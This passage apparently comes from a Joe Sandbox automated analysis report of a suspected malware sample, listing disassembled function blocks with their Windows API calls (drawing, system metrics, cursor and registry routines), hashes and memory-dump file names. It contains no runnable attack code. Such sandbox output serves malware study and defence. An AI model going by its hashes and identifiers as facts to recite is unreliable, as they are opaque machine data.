                                                                                                                                            • API String ID: 3365787578-2194312379
                                                                                                                                            • Opcode ID: b3c23ce7a467b0361a4af07a37e5e3014da30422e39de74693dcd45aedcc1419
                                                                                                                                            • Instruction ID: b5e69f725b9770fc443328d7c6c950c0718e57fffd5747e52c032dde888298eb
                                                                                                                                            • Opcode Fuzzy Hash: b3c23ce7a467b0361a4af07a37e5e3014da30422e39de74693dcd45aedcc1419
                                                                                                                                            • Instruction Fuzzy Hash: 1121BD70E04249AFDF41EFA4D8919EEF7BAFB89300F4088A4E500A7640DB39A915DF60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 029FB0FC
                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 029FB111
                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 029FB11C
                                                                                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 029FB146
                                                                                                                                              • Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                            • API String ID: 2545840971-1370492664
                                                                                                                                            • Opcode ID: b02946b3d520ef2a53d3d86cf37fb5c9249c5bde5b693c64affae9ac110014e3
                                                                                                                                            • Instruction ID: 73d7525383647631f9af74fc773e537b75dabdf67a33b795419864579a4d7f62
                                                                                                                                            • Opcode Fuzzy Hash: b02946b3d520ef2a53d3d86cf37fb5c9249c5bde5b693c64affae9ac110014e3
                                                                                                                                            • Instruction Fuzzy Hash: C4110331B40708DFD7A0CF64DC587A7B7E9EB4A758F104929EE1597280D770A840CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 029FB1D0
                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 029FB1E5
                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 029FB1F0
                                                                                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 029FB21A
                                                                                                                                              • Part of subcall function 029FACA4: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 029FAD23
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                            • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                            • API String ID: 2545840971-2774842281
                                                                                                                                            • Opcode ID: 7e08d9feb587eb76296da63ef0f43ee39647e690ffd914853fbcbc30cd093062
                                                                                                                                            • Instruction ID: 3b27105c2f45ad46d8fd705999c8ce9954206475e826c2bade929796b9354b53
                                                                                                                                            • Opcode Fuzzy Hash: 7e08d9feb587eb76296da63ef0f43ee39647e690ffd914853fbcbc30cd093062
                                                                                                                                            • Instruction Fuzzy Hash: 9011D331A407019FE7A0CFA4EC58BFBB7E9EB59715F004929EE55E7241D770A405CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029F3C9C: GetObjectA.GDI32(?,00000004), ref: 029F3CB3
                                                                                                                                              • Part of subcall function 029F3C9C: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 029F3CD6
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F4EB2
                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 029F4EBE
                                                                                                                                            • SelectObject.GDI32(?), ref: 029F4ECB
                                                                                                                                            • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,029F4F23,?,?,?,?,00000000), ref: 029F4EEF
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 029F4F09
                                                                                                                                            • DeleteDC.GDI32(?), ref: 029F4F12
                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 029F4F1D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4046155103-0
                                                                                                                                            • Opcode ID: 517821aec44e192d6abf16e21f986b448b36a2be3369a3a31281405b353759a7
                                                                                                                                            • Instruction ID: c97996b174035e6401a245136faa4217b9f6a6d0b6eda3a7efcf0d0cc111b3e0
                                                                                                                                            • Opcode Fuzzy Hash: 517821aec44e192d6abf16e21f986b448b36a2be3369a3a31281405b353759a7
                                                                                                                                            • Instruction Fuzzy Hash: 17113372E04249ABDB50EFE8DC50AAEB7BDEB88700F4184B5F708D7240D7759A409B60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCursorPos.USER32 ref: 02A21CA3
                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 02A21CB0
                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02A21CBE
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02A21CC5
                                                                                                                                            • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 02A21CEE
                                                                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 02A21D00
                                                                                                                                            • SetCursor.USER32(00000000), ref: 02A21D12
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1770779139-0
                                                                                                                                            • Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                                                            • Instruction ID: 0404f3b872fdf192a3a75d2e97b7b8ec467ea1e0cd0d2ca0d544a13d534e8f8c
                                                                                                                                            • Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                                                            • Instruction Fuzzy Hash: 0501B5251043A0B5C7216BA88DC0F7FB6A9DFC1B55F10855AFAC89A191EB25DC04E726
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029DBE3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 029DBE59
                                                                                                                                              • Part of subcall function 029DBE3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029DBE7D
                                                                                                                                              • Part of subcall function 029DBE3C: GetModuleFileNameA.KERNEL32(029D0000,?,00000105), ref: 029DBE98
                                                                                                                                              • Part of subcall function 029DBE3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029DBF2E
                                                                                                                                            • CharToOemA.USER32(?,?), ref: 029DBFFB
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 029DC018
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029DC01E
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,029DC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029DC033
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,029DC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029DC039
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 029DC05B
                                                                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 029DC071
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 185507032-0
                                                                                                                                            • Opcode ID: 48930eaee96cf707baaadabd5c0deb6a5188e2885c3af6aa9b95758ca3495fe3
                                                                                                                                            • Instruction ID: a445271fcfaac2965de9e4e5e934ffff82ac63a9558953194b735b5ee7c49d3f
                                                                                                                                            • Opcode Fuzzy Hash: 48930eaee96cf707baaadabd5c0deb6a5188e2885c3af6aa9b95758ca3495fe3
                                                                                                                                            • Instruction Fuzzy Hash: 30115EB2548200BAD600FBA4DC84F9B77EEAB85700F808A1AB754D71D1DB35D905AF72
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • FillRect.USER32(?,?), ref: 02A1CAE5
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 02A1CB10
                                                                                                                                            • FillRect.USER32(?,?,00000000), ref: 02A1CB2F
                                                                                                                                              • Part of subcall function 02A1C9E0: CallWindowProcA.USER32(?,?,?,?,?), ref: 02A1CA1A
                                                                                                                                            • BeginPaint.USER32(?,?), ref: 02A1CBA7
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 02A1CBD4
                                                                                                                                            • EndPaint.USER32(?,?,02A1CC48), ref: 02A1CC34
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 901200654-0
                                                                                                                                            • Opcode ID: fad91948685d8604bdc544dced004dbbdfb50b05d717b117eb10e07bef2a2e01
                                                                                                                                            • Instruction ID: f6e98406d05c2c01a1599464e98ae0b61dd3dafc121b2ab9bf66bd27ead5e7a7
                                                                                                                                            • Opcode Fuzzy Hash: fad91948685d8604bdc544dced004dbbdfb50b05d717b117eb10e07bef2a2e01
                                                                                                                                            • Instruction Fuzzy Hash: 8351ED75A44208EFCB10DBA8C588E9DB7FAAF49330F1481A5E509EB261DB34AE45DF05
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029DF991
                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029DF9AD
                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 029DF9E6
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029DFA63
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 029DFA7C
                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 029DFAB1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 351091851-0
                                                                                                                                            • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                            • Instruction ID: cfbef3160629cfcdfd51e8967086049047c6181907887967ff2bd9fea4b7c22f
                                                                                                                                            • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                            • Instruction Fuzzy Hash: 9A51E9B59006299BCB22EF58CC91BD9B3FDAF48340F0081D5E54AE7611D734AF849F65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 029ED6EF
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 029ED6FE
                                                                                                                                              • Part of subcall function 029ED6BC: ResetEvent.KERNEL32(000002D4,029ED739), ref: 029ED6C2
                                                                                                                                            • EnterCriticalSection.KERNEL32(02A6A2EC), ref: 029ED743
                                                                                                                                            • InterlockedExchange.KERNEL32(02A3AAF0,?), ref: 029ED75F
                                                                                                                                            • LeaveCriticalSection.KERNEL32(02A6A2EC,00000000,029ED88A,?,00000000,029ED8A9,?,02A6A2EC), ref: 029ED7B8
                                                                                                                                            • EnterCriticalSection.KERNEL32(02A6A2EC,029ED834,029ED88A,?,00000000,029ED8A9,?,02A6A2EC), ref: 029ED827
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2189153385-0
                                                                                                                                            • Opcode ID: bd53ed9f45182ebcb0166aac18f2a05136882320fbb2746a67b4ef329e3b8ae8
                                                                                                                                            • Instruction ID: 2b0dcef3a8d9d5fa4ef284155d296c570a33968f6667893ad5b70145f450ca97
                                                                                                                                            • Opcode Fuzzy Hash: bd53ed9f45182ebcb0166aac18f2a05136882320fbb2746a67b4ef329e3b8ae8
                                                                                                                                            • Instruction Fuzzy Hash: 0431C074A04644AFEB02DFA8D851A69B7FDEB89B00F52C8B5E402D2650D7769940DE31
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 029F3F9A
                                                                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 029F3FA6
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F3FC2
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 029F3FE9
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 029F3FF6
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 029F402F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDeviceMetricsSystem$Release
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 447804332-0
                                                                                                                                            • Opcode ID: 8815c8232b950d692c96111b6370d77ffa7ad65a51e1855f9ca68a65d17b76ff
                                                                                                                                            • Instruction ID: b4c30d3c06dc3dc745655d6e821cd2108c3f51ae23db589287bbef1f654156a2
                                                                                                                                            • Opcode Fuzzy Hash: 8815c8232b950d692c96111b6370d77ffa7ad65a51e1855f9ca68a65d17b76ff
                                                                                                                                            • Instruction Fuzzy Hash: 81315070A00244EFEB50DFA4C880AAEBBB5FF89310F14C565EA14AB794D735AD41CF64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029F4258: GetObjectA.GDI32(?,00000054), ref: 029F426C
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 029F43CE
                                                                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 029F43EF
                                                                                                                                            • RealizePalette.GDI32(?), ref: 029F43FB
                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 029F4412
                                                                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 029F443A
                                                                                                                                            • DeleteDC.GDI32(?), ref: 029F4443
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1221726059-0
                                                                                                                                            • Opcode ID: e162fbab7d511354293cb40899661c7c51ffbef0cfcd9572b87e74d86ff7d628
                                                                                                                                            • Instruction ID: 25e2d50d169ad2534f9a07a1044c848b013cf9f6a046fce49273d54dc2dbaa3f
                                                                                                                                            • Opcode Fuzzy Hash: e162fbab7d511354293cb40899661c7c51ffbef0cfcd9572b87e74d86ff7d628
                                                                                                                                            • Instruction Fuzzy Hash: C5111F75A042047BDB50DBA9DC41F9EB7FDEF88710F51C464BA18E7280D67499009B64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 029F3C11
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 029F3C1A
                                                                                                                                            • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,029F6197,?,?,?,?,029F4D0F), ref: 029F3C2E
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 029F3C3A
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 029F3C40
                                                                                                                                            • CreatePalette.GDI32 ref: 029F3C87
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2515223848-0
                                                                                                                                            • Opcode ID: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
                                                                                                                                            • Instruction ID: d5d7e42cba77ee7c6fd0db8cd1bac699a388ce81e58e18844d6e60de54a3b63c
                                                                                                                                            • Opcode Fuzzy Hash: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
                                                                                                                                            • Instruction Fuzzy Hash: 3401B56120834062D694B77AEC42B6F72BD9FC0714F04C85DBEC987281E77DC885D76A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029F2AA8: CreateBrushIndirect.GDI32(?), ref: 029F2B53
                                                                                                                                            • UnrealizeObject.GDI32(00000000), ref: 029F32EC
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 029F32FE
                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 029F3321
                                                                                                                                            • SetBkMode.GDI32(?,00000002), ref: 029F332C
                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 029F3347
                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 029F3352
                                                                                                                                              • Part of subcall function 029F1CEC: GetSysColor.USER32(?), ref: 029F1CF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3527656728-0
                                                                                                                                            • Opcode ID: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
                                                                                                                                            • Instruction ID: 482c4b9f08ba87cd9fbb404f9c38cfedbe4e24ead562e8ae163aef753363e5f3
                                                                                                                                            • Opcode Fuzzy Hash: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
                                                                                                                                            • Instruction Fuzzy Hash: B3F09CB5A002409BDF80FFBDEDC5E0B7BAEAF843167048490BA08DF196CA65D8109F31
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029D36F2
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029D3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029D3725
                                                                                                                                            • RegCloseKey.ADVAPI32(?,029D3748,00000000,?,00000004,00000000,029D3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029D373B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                            • API String ID: 3677997916-4173385793
                                                                                                                                            • Opcode ID: db6798b52460b9825ba5e5f0612fabfe9acfa68bc3b7e17f6cf90e28c5bdc40c
                                                                                                                                            • Instruction ID: 08fcd9cdaf6dae6bbebcc40bd99f1730c3bb4a7ff1ec1f443d4dbd7570b076d2
                                                                                                                                            • Opcode Fuzzy Hash: db6798b52460b9825ba5e5f0612fabfe9acfa68bc3b7e17f6cf90e28c5bdc40c
                                                                                                                                            • Instruction Fuzzy Hash: 7E01F5B5940318B9EB11DB90DC41BFD73ECDB49B01F1080A1BA04D25C0E6759510EF59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 02A1BC0B
                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 02A1BC9A
                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 02A1BCC9
                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 02A1BCF8
                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 02A1BD1B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
